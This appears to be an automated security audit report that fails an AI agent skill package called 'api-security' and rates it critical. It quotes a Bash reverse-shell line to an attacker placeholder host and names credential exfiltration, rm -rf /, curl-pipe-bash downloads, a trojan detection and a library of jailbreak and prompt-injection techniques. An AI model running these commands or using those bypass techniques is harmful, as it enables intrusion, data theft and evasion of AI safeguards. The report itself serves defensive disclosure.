Skills
skills/transilienceai/communitytools/api-security/Gen Agent Trust Hub

api-security

Fail

Audited by Gen Agent Trust Hub on May 11, 2026

Risk Level: CRITICALREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
  • [REMOTE_CODE_EXECUTION]: Documentation in reference/web-llm-attacks-cheat-sheet.md and reference/web-llm-attacks-quickstart.md includes functional reverse shell payloads for Bash, Netcat, Python, and Perl (e.g., bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1).
  • [DATA_EXFILTRATION]: Numerous commands are provided for exfiltrating sensitive system files and credentials (e.g., /etc/passwd, ~/.aws/credentials) to remote servers via HTTP POST, GET, and DNS exfiltration.
  • [PROMPT_INJECTION]: The skill provides an exhaustive library of jailbreak techniques, instruction overrides, and indirect prompt injection patterns designed to bypass LLM safety guardrails.
  • [COMMAND_EXECUTION]: Payloads include destructive system commands (e.g., rm -rf /) and techniques for manipulating database records via SQL and NoSQL injection.
  • [EXTERNAL_DOWNLOADS]: Reference guides provide specific commands for downloading and piping remote scripts directly into system shells (e.g., curl [URL] | bash).
  • [REMOTE_CODE_EXECUTION]: An automated anti-virus scanner detected a Trojan (Script:SNH-gen [Trj]) within the documentation file reference/web-llm-attacks-cheat-sheet.md.
Recommendations
  • CRITICAL: 1 infected file(s) detected - DO NOT USE
  • AI detected serious security threats
Audit Metadata
Risk Level
CRITICAL
Analyzed
May 11, 2026, 07:45 AM
Security Audit — agent-trust-hub — api-security